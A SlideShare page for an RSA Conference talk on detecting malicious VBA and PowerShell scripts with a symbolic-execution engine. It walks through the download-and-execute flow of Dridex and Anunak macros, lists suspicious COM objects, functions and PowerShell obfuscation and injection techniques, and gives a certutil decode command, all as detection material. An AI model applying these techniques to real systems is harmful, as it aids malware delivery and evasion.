SlideShare a Scribd company logo

Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac

Priyanka Aash, profile picture
Priyanka Aash

The document discusses the threat of agentless/non-malware attacks and presents a framework to assess the maliciousness of scripts, particularly focusing on VBA and PowerShell. It details case studies of malware campaigns, such as Dridex and Anunak, explaining their execution flow and methods of obfuscation. Additionally, the document introduces symbolic execution as a potential technique for analysis and various patterns associated with suspicious activities in scripts.

Technology
1 of 95
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
SESSION ID:SESSION ID: #RSAC Rotem Salinas Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats HTA-R11 Senior Security Researcher RSA Security Rotem.Salinas@rsa.com @rotemsalinas Uri Fleyder-Kotler Advanced Threats Research Lab Manager RSA Security Uri.Fleyder@rsa.com @ufleyder
#RSAC Houston We Have a Problem 2 Agentless/non malware attacks is a rapidly growing threat Attackers are implementing stealthier methods to bypass defenses
#RSAC Research Goals 3 Goals Find a way to assess a script’s “maliciousness” automatically Do it without the potential harm of infection Make it fast! Narrow the problem space VBA Powershell Not focused on the code extraction The same concepts can apply to similar problems
#RSAC The “Imaginary Engine” 4 How can we develop such 1337 imaginary engine Problem solving in 3 basic steps Analyze Brainstorming Implementation
#RSAC The First Step – Malware Analyst Standpoint 5 Determine Execution Flow Deobfuscate Find Suspicious Activity Traditional Static Analysis Approach
#RSAC Perception Test – What Attackers Do? 6
#RSAC The First Step – Understanding The Attacker’s Mindset 7
#RSAC The First Step – Understanding The Attacker’s Mindset 8
#RSAC The First Step – The Attacker’s Main Objectives 9 Objectives Indicators Code execution Prerequisite, Spawning New Processes/Threads Persistency Disk operations, Registry operations Stealth OS manipulation Enumeration Registry operations, Enumeration Command & Control / Data Exfiltration Network operations Lateral Movement Network operations, Enumeration
#RSAC Case Study – Dridex Campaign 10 Peaked during 2015-2016 Used Macro in Office Documents to deploy Dridex variants Targeted many companies and financial entities around the world Delivered in a large scale Spam/Spear-Phishing campaigns
#RSAC Case Study – Dridex Campaign 11
#RSAC Case Study 1 – Dridex Campaign 12 Entrypoint – This is where the code starts its execution Non-Linear Code Execution - GoTo jumping to labels
#RSAC Case Study 1 – Dridex Campaign 13 COM Object Creation
#RSAC Case Study 1 – Dridex Campaign 14 URL De-Obfuscation + Http Request Creation
#RSAC Case Study 1 – Dridex Campaign 15 Sending GET request Initializing ADODB object to write file to disk
#RSAC Case Study 1 – Dridex Campaign 16 Writing Response Body Data to disk
#RSAC Case Study 1 – Dridex Campaign 17 Executing Downloaded File
#RSAC Case Study – Anunak/Carbanak 18 Financial APT Only 1 submission to VT Attributed to Anunak Cybergang Final payload VBS/Powershell PE Executable See Full Analysis in Appendix
#RSAC The Second Step – Brainstorming 19 Common approaches pros and cons Hooking — Use available source code or patch existing dll/exe — Inserting code that would sink certain expressions — Remove potentially harmful code Taint Analysis / Symbolic Execution — Implement an engine that would emulate the language interpreter — The engine should evaluate each line of code — Instead of invoking potentially harmful expressions it would sink them
#RSAC We Have a Winner! 20 Symbolic Execution Pros — Cannot harm the machine in any way (even if we missed something) — We know exactly how it works. NO Reverse Engineering! — Not limited to specific platform/OS Cons — Hard to Implement — Might lack some language functionality
#RSAC Symbolic Execution: Double Sweep Method 21 First sweep Global context — Global variables — Code Function declarations External DLL declarations
#RSAC Symbolic Execution: Double Sweep Method 22 Second sweep Function code - starts with Entrypoint Follows execution flow Executes stubs instead of built-in language functions Evaluates expressions — Math — String manipulation — Logical expressions (condition evaluation)
#RSAC Implementation Details 23 Python PyParsing Dave Beazley’s (Python guru) PLY – Python Lex Yacc — Lex – lexical analysis/tokenizer — Yacc (Yet Another Compiler Compiler) – Syntax Analyzer BNF – Backus Naur Form Where to start  RTFM
#RSAC Lexical Analyzer (Tokenizer) 24 Tokens Language keywords Immediate values — Strings — Integer/numeric values — Floating point values — Arrays/compound data-types Identifiers – variable names, function names, object names Operators – math, bitwise, logical, string manipulation * Diagram courtesy of David Beazley
#RSAC Syntax Analyzer (Parser) 25 Parses a language syntax according to the tokenized output from the lexer The language syntax/grammar is defined by multiple functions Each function represents a BNF expression and will pass the parsed/extracted values to the next function inline according to the BNF statement * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 26 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 27 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 28 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 29 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 30 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 31 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 32 * Diagram courtesy of David Beazley
#RSAC PLY Lex Example 33 * Diagram courtesy of David Beazley
#RSAC Tokenizer Demo 34
#RSAC PLY Yacc Example 35 * Diagram courtesy of David Beazley
#RSAC PLY Yacc Example 36 * Diagram courtesy of David Beazley
#RSAC PLY Yacc Example 37 * Diagram courtesy of David Beazley
#RSAC PLY Yacc Example 38 * Diagram courtesy of David Beazley
#RSAC PLY Yacc Example 39 * Diagram courtesy of David Beazley
#RSAC Engine Design Overview 40 Scoring Blacklist (score++) Whitelist (score--) A higher score -> more malicious If score >= threshold Then isMalicious = True;
#RSAC Obfuscation As Heuristics 41 Obfuscation can be a strong indicator for malicious behavior Examples Object returned from function call Object created from function call return value string
#RSAC Obfuscation As Heuristics – More Examples 42 More Examples Self modifying code (during runtime) Data read from controls embedded in the document is considered suspicious
#RSAC Demo The Engine 43
#RSAC The Age Old Question of FP vs. FN 44 False positives False negatives Decide what works best for you!
#RSAC Lessons Learned 45 Challenges Condition evaluation Recursion limit Lessons When in doubt bruteforce! Use the language specification guide as a guideline rather than implementing every language feature that exists
#RSAC Apply 46 DIY 1: Develop It Yourself DIY 2: Deploy In Your Organization Network Endpoint Use for your investigations
#RSAC Q&A Rotem Salinas Uri Fleyder-Kotler  Uri.Fleyder@rsa.com  @ufleyder  Rotem.Salinas@rsa.com  @rotemsalinas
#RSAC VBA Indicators of Suspicious Activity 48 File System Operations COM Objects: Scripting.FileSystemObject, ADODB.Stream Cmd – output redirect/copy/del/move Open builtin function Importing External DLLs - URLMON Network Operations COM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest OS Manipulation Importing External DLLs – KERNEL32 WMI Objects Registry Importing External DLLs – ADVAPI32
#RSAC VBA Indicators of Suspicious Activity 49 Enumeration WMI Objects Cmd – net share/net use/ipconfig/environment variables Obfuscation Self Modifying Code Eval CodeModule Obfuscation Beyond Reasonable Doubt 
#RSAC VBA Indicators of Suspicious Activity 50 COM Object Creation WMI Objects Creation Self Modifying Code Eval CodeModule Built-In Functions Importing External DLL Obfuscation Beyond Reasonable Doubt 
#RSAC VBA – COM Object Creation – Network Activity 51 Rule of thumb - If your Office Documents are communicating you are in serious trouble Network Activity - COM Objects Microsoft.XMLHTTP MSXML2.SERVERXMLHTTP.6.0 MSXML2.SERVERXMLHTTP MSXML2.XMLHTTP WinHttp.WinHttpRequest.5.1 WinHttp.WinHttpRequest InternetExplorer.Application
#RSAC VBA – COM Object Creation – Network Activity 52 Microsoft.XMLHTTP WinHttp.WinHttpRequest.5.1
#RSAC VBA – COM Object Creation – File System Activity 53 Scripting.FileSystemObject ADODB.Stream
#RSAC VBA – COM Object Creation – Command Execution 54 WScript.Shell Shell.Application
#RSAC VBA – COM Object Creation – Obfuscation 55 XStandard.Base64 MSXML2.DOMDocument.3.0 MSXML2.DOMDocument
#RSAC VBA – Built-In Functions 56 CreateObject – Create COM object by String Object Name GetObject – Create WMI/COM object Eval – Covered In Self-Modifying ExecuteGlobal – VBS specific CallByName – Calls a Function/Method by string name Shell – Executes a Command Environ – Evaluates Environment Variables Kill – Deletes a File Application.Run – Calls a Function by String Name
#RSAC VBA – WMI Object Creation 57 winmgmts:impersonationLevel=impersonate}!.rootcimv2 Examples . .
#RSAC VBA – Self-Modifying Code – Code Module 58 CodeModule – Allows modifications of the VBA code
#RSAC VBA – Self-Modifying Code – Eval 59 Eval - Evaluates an expression and executes it code ExecuteGlobal
#RSAC VBA – Open Built-In Function 60 Write to File with Open Built-In Function
#RSAC VBA – Importing External DLL 61 Win32 API Examples . .
#RSAC Appendix – Case Study 1 A - Dridex 62 Entrypoint – This is where the code starts its execution Non-Linear Code Execution - GoTo jumping to labels
#RSAC Appendix – Case Study 1 A - Dridex 63 COM Object Creation
#RSAC Appendix – Case Study 1 A - Dridex 64 URL De-Obfuscation + Http Request Creation
#RSAC Appendix – Case Study 1 A - Dridex 65 Sending GET request Initializing ADODB object to write file to disk
#RSAC Appendix – Case Study 1 A - Dridex 66 Writing Response Body Data to disk
#RSAC Appendix – Case Study 1 A - Dridex 67 Executing Downloaded File
#RSAC Appendix – Case Study 1 B - Dridex 68 Defining Globals Entrypoint
#RSAC Appendix – Case Study 1 B - Dridex 69 Create obfuscated COM object
#RSAC Appendix – Case Study 1 B - Dridex 70 Create more obfuscated COM objects
#RSAC Appendix – Case Study 1 B - Dridex 71 Deobfuscate URL and create GET request
#RSAC Appendix – Case Study 1 B - Dridex 72 Send GET request
#RSAC Appendix – Case Study 1 B - Dridex 73 Receive Response Body and write to File
#RSAC Appendix – Case Study 1 B - Dridex 74 Save To Disk Execution
#RSAC Appendix – Case Study 2 - Ananuk 75 Entrypoint De-obfuscate
#RSAC Appendix – Case Study 2 - Ananuk 76 Beacon and Deploy final Payload De-Obfuscate
#RSAC Appendix – Case Study 2 - Ananuk 77 Beacon Command & Control – Phase 1 Deobfuscate
#RSAC Appendix – Case Study 2 - Ananuk 78 Beacon Command & Control – Phase 2 Deobfuscate
#RSAC Appendix – Case Study 2 - Ananuk 79 Deploy Base64 Payload Write Base64 Decoded Payload to Temp Path Execute Payload
#RSAC Appendix – Case Study 2 - Ananuk 80 Analyzing Payload 1 Payload is an icon Used for credibility Attempts to gain persistency on the Victim’s machine both by using known Autorun registry paths and by creating A scheduled task using the schtasks command
#RSAC Appendix – Powershell Indicators of Suspicious Activity 81 .NET Objects .NET Reflection Add-Type New-Object WinAPI32 DLL Loading WMI Objects Invoke-WmiMethod Command Execution Invoke-Command COM Objects New-Object –Com
#RSAC Appendix – Powershell Obfuscation 82 Obfuscation Methods Base64 SecureString Custom Decoding Methods
#RSAC Powershell Techniques - .NET Reflection 83 Example 1 – LoadWithPartialName Example 2 - LoadName
#RSAC Powershell Techniques - Add-Type .NET code injection 84 Creation of a new type/class using .NET code Creating an instance of the class and invoking it’s Start method
#RSAC Powershell Techniques – New-Object 85 Creating an object instance In this example System.Net.WebClient instance is created in order to download a file
#RSAC Powershell Techniques - Invoke-WmiMethod 86 Using WMI for enumeration and system maniupulation In this case creating a key in the windows registry
#RSAC Powershell Techniques - DLL loading 87 Resolving Native Win32 API functions $module = “kernel32.dll” API Function to be resolved
#RSAC Powershell Techniques - New-Object -com 88 Similarly to the COM objects in VBA The same COM objects can be used in Powershell using this command
#RSAC Powershell Techniques Obfuscation 89 Obfuscation methods in Powershell Adding Ticks (Escapes special characters but ignored if used non- special characters) + Lowercase/Uppercase String Concatenation/Manipulation Get-Command + WildCards + Aliases Invoke-Expression
#RSAC Powershell Techniques Obfuscation - Base64 90 Base64 using .NET classes CertUtil By Executing the certutil tool as a command certutil -decode encodedInputFileName decodedOutputFileName
#RSAC Case Study 3 – Targeted Spear Phishing Campaign 91 Javascript outer script with obfuscated strings Base64 encoded payloads Each string in the list is reversed A list of string including commands and base64 Encoded payloads
#RSAC Case Study 3 – Targeted Spear Phishing Campaign 92 Deploys 3 Powershell scripts on the victims machine Payload 1 – .NET code injection using Add-Type Creation of a new type/class using .NET code Creating an instance of the class and invoking it’s Start method
#RSAC Case Study 3 – Targeted Spear Phishing Campaign 93 Payload 2 – .NET code injection using Add-Type like the 1st payload Imports multiple Win32 api functions using .NET
#RSAC Case Study 3 – Targeted Spear Phishing Campaign 94 Payload 3 – Downloads TOR Proxifier as scheduled task
#RSAC Case Study 4 – Powersploit + Invoke-Obfuscation 95 Open source project available on GitHub PowerSploit includes capabilities such as: Shellcode injection Reflective DLL injection WMI Code execution Mimikatz – NTLM/LM password dump Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon

More Related Content

PDF
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
nullowaspmumbai
 
PPT
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Tom Keetch
 
PPTX
Open arkcompiler
yiwei yang
 
PDF
Null 14 may_lesser_known_attacks_by_ninadsarang
Ninad Sarang
 
PPTX
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
 
PDF
Wahckon[2] - iOS Runtime Hacking Crash Course
eightbit
 
PDF
Rootcon X - Reverse Engineering Swift Applications
eightbit
 
PDF
Improving DroidBox
Kelwin Yang
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
nullowaspmumbai
 
Steelcon 2015 Reverse-Engineering Obfuscated Android Applications
Tom Keetch
 
Open arkcompiler
yiwei yang
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Ninad Sarang
 
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
 
Wahckon[2] - iOS Runtime Hacking Crash Course
eightbit
 
Rootcon X - Reverse Engineering Swift Applications
eightbit
 
Improving DroidBox
Kelwin Yang
 

What's hot (20)

PPTX
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
 
PPTX
Reverse engineering android apps
Pranay Airan
 
PDF
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
CTruncer
 
PDF
Secure Coding in Perl
Ian Kluft
 
PDF
Enforcing API Design Rules for High Quality Code Generation
Tim Burks
 
PPTX
Static code analysis
Rune Sundling
 
PDF
Securing a Raspberry Pi and other DIY IoT devices
Ian Kluft
 
PDF
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019
Alexandre Borges
 
PDF
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
Felipe Prado
 
PPTX
Actor Concurrency Bugs: A Comprehensive Study on Symptoms, Root Causes, API U...
Raffi Khatchadourian
 
PPTX
The Veil-Framework
VeilFramework
 
PDF
Introduction to Dynamic Analysis of Android Application
Kelwin Yang
 
PPTX
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
DefconRussia
 
PDF
Higher Level Malware
CTruncer
 
PDF
A Modest Introduction To Swift
John Anderson
 
PDF
Technical Workshop - Win32/Georbot Analysis
Positive Hack Days
 
PDF
Compiler for Zero-Knowledge Proof-of-Knowledge Protocols
Thomas Briner
 
PDF
Pinpointing Vulnerabilities (Ravel)
Yue Chen
 
PDF
[HUN][Hackersuli] Androidos alkalmazássebészet, avagy gumikesztyűt fel és irá...
hackersuli
 
PPTX
2. introduction to compiler
Saeed Parsa
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
 
Reverse engineering android apps
Pranay Airan
 
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
CTruncer
 
Secure Coding in Perl
Ian Kluft
 
Enforcing API Design Rules for High Quality Code Generation
Tim Burks
 
Static code analysis
Rune Sundling
 
Securing a Raspberry Pi and other DIY IoT devices
Ian Kluft
 
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019
Alexandre Borges
 
DEF CON 27 - DIMITRY SNEZHKOV - zombie ant farm practical tips
Felipe Prado
 
Actor Concurrency Bugs: A Comprehensive Study on Symptoms, Root Causes, API U...
Raffi Khatchadourian
 
The Veil-Framework
VeilFramework
 
Introduction to Dynamic Analysis of Android Application
Kelwin Yang
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
DefconRussia
 
Higher Level Malware
CTruncer
 
A Modest Introduction To Swift
John Anderson
 
Technical Workshop - Win32/Georbot Analysis
Positive Hack Days
 
Compiler for Zero-Knowledge Proof-of-Knowledge Protocols
Thomas Briner
 
Pinpointing Vulnerabilities (Ravel)
Yue Chen
 
[HUN][Hackersuli] Androidos alkalmazássebészet, avagy gumikesztyűt fel és irá...
hackersuli
 
2. introduction to compiler
Saeed Parsa
 
Ad

Similar to Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac (20)

PPTX
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
PDF
Autonomous Hacking: The New Frontiers of Attack and Defense
Priyanka Aash
 
PDF
Applied machine learning defeating modern malicious documents
Priyanka Aash
 
PDF
EMBA Firmware analysis - TROOPERS22
EMBA Firmware Analyzer
 
PDF
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Priyanka Aash
 
PDF
FIM and System Call Auditing at Scale in a Large Container Deployment
Priyanka Aash
 
PDF
Corpsec: “What Happened to Corpses A and B?”
Priyanka Aash
 
PPTX
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
lior mazor
 
PDF
RSA APJ Velociraptor Lab
Velocidex Enterprises
 
PDF
Open source-in-security-critical-environments
DESMOND YUEN
 
PDF
Open Source in Security-Critical Environments
Priyanka Aash
 
PDF
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
PDF
OSX Pirrit : Why you should care about malicious mac adware
Priyanka Aash
 
PDF
Serverless Security: Are you ready for the Future?
James Wickett
 
PDF
Red team-view-gaps-in-the-serverless-application-attack-surface
Priyanka Aash
 
PDF
Android Serialization Vulnerabilities Revisited
Priyanka Aash
 
PDF
The Pivot
Priyanka Aash
 
PDF
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
PDF
Stop Passing the Bug: IoT Supply Chain Security
Synopsys Software Integrity Group
 
PDF
Attacks on Critical Infrastructure: Insights from the “Big Board”
Priyanka Aash
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Autonomous Hacking: The New Frontiers of Attack and Defense
Priyanka Aash
 
Applied machine learning defeating modern malicious documents
Priyanka Aash
 
EMBA Firmware analysis - TROOPERS22
EMBA Firmware Analyzer
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Priyanka Aash
 
FIM and System Call Auditing at Scale in a Large Container Deployment
Priyanka Aash
 
Corpsec: “What Happened to Corpses A and B?”
Priyanka Aash
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
lior mazor
 
RSA APJ Velociraptor Lab
Velocidex Enterprises
 
Open source-in-security-critical-environments
DESMOND YUEN
 
Open Source in Security-Critical Environments
Priyanka Aash
 
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
OSX Pirrit : Why you should care about malicious mac adware
Priyanka Aash
 
Serverless Security: Are you ready for the Future?
James Wickett
 
Red team-view-gaps-in-the-serverless-application-attack-surface
Priyanka Aash
 
Android Serialization Vulnerabilities Revisited
Priyanka Aash
 
The Pivot
Priyanka Aash
 
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Stop Passing the Bug: IoT Supply Chain Security
Synopsys Software Integrity Group
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Priyanka Aash
 
Ad

More from Priyanka Aash (20)

PPTX
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
PDF
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
Priyanka Aash
 
PDF
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
 
PDF
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
Priyanka Aash
 
PDF
Lessons Learned from Developing Secure AI Workflows.pdf
Priyanka Aash
 
PDF
Cyber Defense Matrix Workshop - RSA Conference
Priyanka Aash
 
PDF
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
Priyanka Aash
 
PDF
Securing AI - There Is No Try, Only Do!.pdf
Priyanka Aash
 
PDF
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
Priyanka Aash
 
PDF
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
Priyanka Aash
 
PDF
10 Key Challenges for AI within the EU Data Protection Framework.pdf
Priyanka Aash
 
PDF
Techniques for Automatic Device Identification and Network Assignment.pdf
Priyanka Aash
 
PDF
Keynote : Presentation on SASE Technology
Priyanka Aash
 
PDF
Keynote : AI & Future Of Offensive Security
Priyanka Aash
 
PDF
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
PDF
Demystifying Neural Networks And Building Cybersecurity Applications
Priyanka Aash
 
PDF
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
Priyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
Priyanka Aash
 
PDF
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
Priyanka Aash
 
AI Code Generation Risks (Ramkumar Dilli, CIO, Myridius)
Priyanka Aash
 
From Chatbot to Destroyer of Endpoints - Can ChatGPT Automate EDR Bypasses (1...
Priyanka Aash
 
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Priyanka Aash
 
Oh, the Possibilities - Balancing Innovation and Risk with Generative AI.pdf
Priyanka Aash
 
Lessons Learned from Developing Secure AI Workflows.pdf
Priyanka Aash
 
Cyber Defense Matrix Workshop - RSA Conference
Priyanka Aash
 
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
Priyanka Aash
 
Securing AI - There Is No Try, Only Do!.pdf
Priyanka Aash
 
GenAI Opportunities and Challenges - Where 370 Enterprises Are Focusing Now.pdf
Priyanka Aash
 
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
Priyanka Aash
 
10 Key Challenges for AI within the EU Data Protection Framework.pdf
Priyanka Aash
 
Techniques for Automatic Device Identification and Network Assignment.pdf
Priyanka Aash
 
Keynote : Presentation on SASE Technology
Priyanka Aash
 
Keynote : AI & Future Of Offensive Security
Priyanka Aash
 
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Demystifying Neural Networks And Building Cybersecurity Applications
Priyanka Aash
 
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
(CISOPlatform Summit & SACON 2024) Kids Cyber Security .pdf
Priyanka Aash
 
(CISOPlatform Summit & SACON 2024) Regulation & Response In Banks.pdf
Priyanka Aash
 
(CISOPlatform Summit & SACON 2024) Cyber Insurance & Risk Quantification.pdf
Priyanka Aash
 

Recently uploaded (20)

PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Teaching material agriculture food technology
LiaRayya
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 

Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac

  • 1. SESSION ID:SESSION ID: #RSAC Rotem Salinas Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats HTA-R11 Senior Security Researcher RSA Security Rotem.Salinas@rsa.com @rotemsalinas Uri Fleyder-Kotler Advanced Threats Research Lab Manager RSA Security Uri.Fleyder@rsa.com @ufleyder
  • 2. #RSAC Houston We Have a Problem 2 Agentless/non malware attacks is a rapidly growing threat Attackers are implementing stealthier methods to bypass defenses
  • 3. #RSAC Research Goals 3 Goals Find a way to assess a script’s “maliciousness” automatically Do it without the potential harm of infection Make it fast! Narrow the problem space VBA Powershell Not focused on the code extraction The same concepts can apply to similar problems
  • 4. #RSAC The “Imaginary Engine” 4 How can we develop such 1337 imaginary engine Problem solving in 3 basic steps Analyze Brainstorming Implementation
  • 5. #RSAC The First Step – Malware Analyst Standpoint 5 Determine Execution Flow Deobfuscate Find Suspicious Activity Traditional Static Analysis Approach
  • 6. #RSAC Perception Test – What Attackers Do? 6
  • 7. #RSAC The First Step – Understanding The Attacker’s Mindset 7
  • 8. #RSAC The First Step – Understanding The Attacker’s Mindset 8
  • 9. #RSAC The First Step – The Attacker’s Main Objectives 9 Objectives Indicators Code execution Prerequisite, Spawning New Processes/Threads Persistency Disk operations, Registry operations Stealth OS manipulation Enumeration Registry operations, Enumeration Command & Control / Data Exfiltration Network operations Lateral Movement Network operations, Enumeration
  • 10. #RSAC Case Study – Dridex Campaign 10 Peaked during 2015-2016 Used Macro in Office Documents to deploy Dridex variants Targeted many companies and financial entities around the world Delivered in a large scale Spam/Spear-Phishing campaigns
  • 11. #RSAC Case Study – Dridex Campaign 11
  • 12. #RSAC Case Study 1 – Dridex Campaign 12 Entrypoint – This is where the code starts its execution Non-Linear Code Execution - GoTo jumping to labels
  • 13. #RSAC Case Study 1 – Dridex Campaign 13 COM Object Creation
  • 14. #RSAC Case Study 1 – Dridex Campaign 14 URL De-Obfuscation + Http Request Creation
  • 15. #RSAC Case Study 1 – Dridex Campaign 15 Sending GET request Initializing ADODB object to write file to disk
  • 16. #RSAC Case Study 1 – Dridex Campaign 16 Writing Response Body Data to disk
  • 17. #RSAC Case Study 1 – Dridex Campaign 17 Executing Downloaded File
  • 18. #RSAC Case Study – Anunak/Carbanak 18 Financial APT Only 1 submission to VT Attributed to Anunak Cybergang Final payload VBS/Powershell PE Executable See Full Analysis in Appendix
  • 19. #RSAC The Second Step – Brainstorming 19 Common approaches pros and cons Hooking — Use available source code or patch existing dll/exe — Inserting code that would sink certain expressions — Remove potentially harmful code Taint Analysis / Symbolic Execution — Implement an engine that would emulate the language interpreter — The engine should evaluate each line of code — Instead of invoking potentially harmful expressions it would sink them
  • 20. #RSAC We Have a Winner! 20 Symbolic Execution Pros — Cannot harm the machine in any way (even if we missed something) — We know exactly how it works. NO Reverse Engineering! — Not limited to specific platform/OS Cons — Hard to Implement — Might lack some language functionality
  • 21. #RSAC Symbolic Execution: Double Sweep Method 21 First sweep Global context — Global variables — Code Function declarations External DLL declarations
  • 22. #RSAC Symbolic Execution: Double Sweep Method 22 Second sweep Function code - starts with Entrypoint Follows execution flow Executes stubs instead of built-in language functions Evaluates expressions — Math — String manipulation — Logical expressions (condition evaluation)
  • 23. #RSAC Implementation Details 23 Python PyParsing Dave Beazley’s (Python guru) PLY – Python Lex Yacc — Lex – lexical analysis/tokenizer — Yacc (Yet Another Compiler Compiler) – Syntax Analyzer BNF – Backus Naur Form Where to start  RTFM
  • 24. #RSAC Lexical Analyzer (Tokenizer) 24 Tokens Language keywords Immediate values — Strings — Integer/numeric values — Floating point values — Arrays/compound data-types Identifiers – variable names, function names, object names Operators – math, bitwise, logical, string manipulation * Diagram courtesy of David Beazley
  • 25. #RSAC Syntax Analyzer (Parser) 25 Parses a language syntax according to the tokenized output from the lexer The language syntax/grammar is defined by multiple functions Each function represents a BNF expression and will pass the parsed/extracted values to the next function inline according to the BNF statement * Diagram courtesy of David Beazley
  • 26. #RSAC PLY Lex Example 26 * Diagram courtesy of David Beazley
